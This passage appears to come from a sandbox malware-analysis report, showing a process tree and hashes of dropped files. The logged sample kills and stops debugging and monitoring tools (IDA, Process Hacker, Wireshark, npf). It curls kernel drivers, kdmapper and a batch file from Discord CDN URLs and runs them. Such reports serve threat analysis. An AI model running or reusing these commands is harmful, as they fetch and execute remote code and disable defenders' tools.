                                                                                                                                          taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                                                                                                                          3⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3752
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                                                                                        2⤵
                                                                                                                                          PID:4292
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop wireshark
                                                                                                                                            3⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:4336
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                                                                                                          2⤵
                                                                                                                                            PID:3620
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc stop npf
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:2352
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                            2⤵
                                                                                                                                              PID:4552
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:916
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                              2⤵
                                                                                                                                                PID:200
                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                  taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                  3⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:588
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                2⤵
                                                                                                                                                  PID:4532
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    sc stop HTTPDebuggerPro
                                                                                                                                                    3⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:4612
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3612
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop KProcessHacker3
                                                                                                                                                      3⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4240
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                                                                                                    2⤵
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4236
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop KProcessHacker2
                                                                                                                                                      3⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1252
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2416
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc stop KProcessHacker1
                                                                                                                                                        3⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:4280
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:980
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc stop wireshark
                                                                                                                                                          3⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:308
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2636
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc stop npf
                                                                                                                                                            3⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:4256
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c color 9
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4444
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4320
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Color D
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3408
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3144
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1112794943572938822/1149747319152050249/WindowsEventHandler.sys -o C:\Windows\IME\WindowsEventHandler.sys --silent
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2380
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1149780851266166804/1152692359319007312/kdmapper.exe -o C:\Windows\IME\kdmapper.exe --silent
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2552
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\IME\kdmapper.exe C:\Windows\IME\WindowsEventHandler.sys
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2528
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Color D
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4324
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2484
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1149780851266166804/1152691954333778070/SystemQWERTY.sys -o C:\Windows\IME\WindowsEventHandler.sys --silent
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4852
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1149780851266166804/1152692359319007312/kdmapper.exe -o C:\Windows\IME\kdmapper.exe --silent
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2556
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\IME\kdmapper.exe C:\Windows\IME\WindowsEventHandler.sys
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4824
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c start https://discord.gg/neznwpwkZb
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:2296
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Color D
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4556
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4240
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1124423736901238974/1151867387918950420/WindowsTASKMGR.sys -o C:\Windows\IME\WindowsTASKMGR.sys --silent
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2940
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1149780851266166804/1152692359319007312/kdmapper.exe -o C:\Windows\IME\GameBar.exe --silent
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4992
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\IME\GameBar.exe C:\Windows\IME\WindowsTASKMGR.sys
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4512
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c start https://discord.gg/neznwpwkZb
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            PID:1556
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Color D
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4600
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4612
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/953694032037548083/1147236332662423603/checker.bat -o C:\Windows\checker.bat --silent
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\checker.bat
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2352
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c start https://discord.gg/neznwpwkZb
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3528
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Color D
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2452
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:5004
                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:4604
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:3260
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:3576
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:3092
                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:592
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:4316
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:2468
                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4572
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1468

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            512KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fa7a9a02ab3cc8cbe999927763197c81

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1ef61338746a952ec2d67d781d5db0cad0fbc436

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            455f61fa8cc389fe484ef70a4c7aa744c381a65486bb8c9cb5d6b2cc516711f5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            42c968e3f6e65710ff03952a3330466cf2dfa3cceeeff2e934b061a9d6151f1e05781b1c12c2810aba10a9fdb52539edf20b2ba40638763f588a33abd454e507

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            3753d25be13c4b1a80bc743621eef6bf

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            ca26e1cc2ecb4ac6267d2118ecef3f5964b7dece

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a4d1946f80a1ab749f56a727fd74915f7310605f7eaee81e84a8075b12d80853

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2b1106180cbc8a18841e810c826dfc5d34918bc0b71994ad8b7a1b683171f222eccf09faa6ff504fdf3ec9d97ffed5942c6b2fb559470deb5c2a32a011379b63

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5b3badfc8cd6d8219104b24f735ce5f1

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4bc324f909381a67725081ef57bb74fd588558ee

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d91d9833be101860e9205b3943bfc679cc73de546c9cb134e04f2b3ec8af0023

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            12718efaa03a0f89261f38a80ba49effb724d027fbaa239d8b49e6c350c87e072bf6d36be2c4ed48a4ea7cd5890923dbe998121237cabf7ecdf9605c98a0c78e

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7f65cf55806d83c76c6e50f544f49d7a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            08a28431925dfa74c7c5462a8b9a6ee0943e4807

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b9ae4cfbe5bad43f81982ef1559d28679f83174e5e89a9ae8c0bf6feac493ddb

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e9917e9eea3d347415d7b395b36630efb486b5966a9e5981c0f005e98151969a9539f3caf45d55f2ef601a24ddade2db294cfe22194c6d9cccf3c76ad131a36d

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            04be582681aac0f1ec62a26f64d2c618

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            a27ecc716f321ec4e7e8343067952b068651e64b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            03f9684384d401bfd14e10a2a241799e2378ce03823e0ee930649f71080b67ef

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            a1756d36e3c133f2457d7348ff8043636ec445b4d8da5d59d75148cc64c1a1dfc313f1db9f6cdeafbc3ed1a8f1e09ff57e317697b11151f3cd4b2ee50754ed49

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFB044019295D452BE.TMP

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            b92a23bf7a9993eeb491dd743ee943fb

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            b52c575ef7091ee7c61e2b2c76d3d36993f2aea8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            10f1ef876c6ef89502d0d3609d35d366c2701a644e84888acc11f16df02e9344

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            1a2ae8a9cbcf358e8acf2608b35957410ef109f9ddc01dbe503ef24173098d72e0e216edf5ffc2d9bb3a6021be4824743302c5de8f018fcc6be06e1c93999722

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a836a52ea8178da5515800e488223c07

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            9dd52012318ffb4a92a40e560c5fef5c045d5ffe

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            62130b842f96751e06dd2c94ba941d9a1ad33daf11c6e1c80449a255883f5761

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            45630fb134e5d5f42cf46d0457b1d569f84717fd9b8cf9c2c4a5af9ffa46787cae78fa844ffc3d09f106c0a55c4704fbf6eb46ac345c1af3b6a647b14009f307

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            408B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            af64265446de79fa3dd5d453ebf1ed0d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            64431cadbac4b3fd0c8fd827336a1b87053b478e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c0b874791e5125ca0f9c3914fdf3960208fdc9f0fe1b578bd73e10cb06a137f1

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            d435f90c37af7735691b8c25c7ba6f9d4554a017d0f7af1ba88f9eea1d5e2b924ab2e0f58a75a4bcfb3cd56e2167d55f6f15307ebc7f7689cad6e60260ea2c5a

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            512KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            2354d638d568b9ee105b2f2c54f49b9b

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            c5edb12ac839de6ec895a4992da53986fe9630e5

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            910763bd48cced0eae88de3f9e3dd2fb5e2256eb4ae6fead0e5affccd635632d

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            0b908330a9c15c899f3a1495e5f4e1b255edd91f4015c8a25e7371444a77bcfb8a6c32ba037c729eea04cc046270d79641ad52c2992bbcdf7c5a744752e8802e

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            512KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9b7d5a7c695ee42985d801228802680d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1c1ba3d0403ececbe3c771e139f8cc9eadaebd57

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            811246150f6aa522d740956a743d784d007e7caabef77211ababc38e6a466581

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7f4ddce1a1f6a0a229e721b14dba9d9cc804d2461d40bc8b2cbafcf85382a7908d6410b8d86f82382e2595bebcb9f7fc8dd8efb730c111af8d992481c93eb8ac

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            afd561210d345c1d02c9bfbdceb66b09

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            7a90d96b53bab917bbb9a1c8ed97e083d42cabb8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f91df7f7be0fd494383a2eff4367f70d380f1145f0cb784adedfc1a541017596

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            30ae509679984ea09b094e67974c34ad9341483c711a620a0526d8a5ad0e85815093e239293fe8658ea57bb980f316b5da385451172fd3614d793f93cd1c220d

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            cfb985d81c310b08ac8f44bff2a5fc1e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            28fe8d672b318b5c5ca25da8030476c709e7b0e8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            310f58d3d14ad1f36e00c3a3f1e4524286cae36f4e984ad24c05922a26071401

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            9379f6328a8d9b5b1b8520cc32252451ab68ecebb12ca12eed64cd419c1c2f804f1a2d124e2c03a96b4d027f5c731ff6bd3489af18a4ac2638dc5b02a66d3b30

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            1628b0daf699e16b23ac4a0327385832

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            21a480dc6f261e2773bb1e2775e04c9c2388e41d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            ba0ba8db66b9e9bc807c38047e89eee7d478b1e329bc613b8b34c9f7a988e7a9

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            6034d2e56def2caa7b7bc00c09c5070b7a4a2881523fc51bcbc4464767e77c737304f662849214f3af5ee853be4a45cd96fd75e38a766e23c82459f743ecf05f

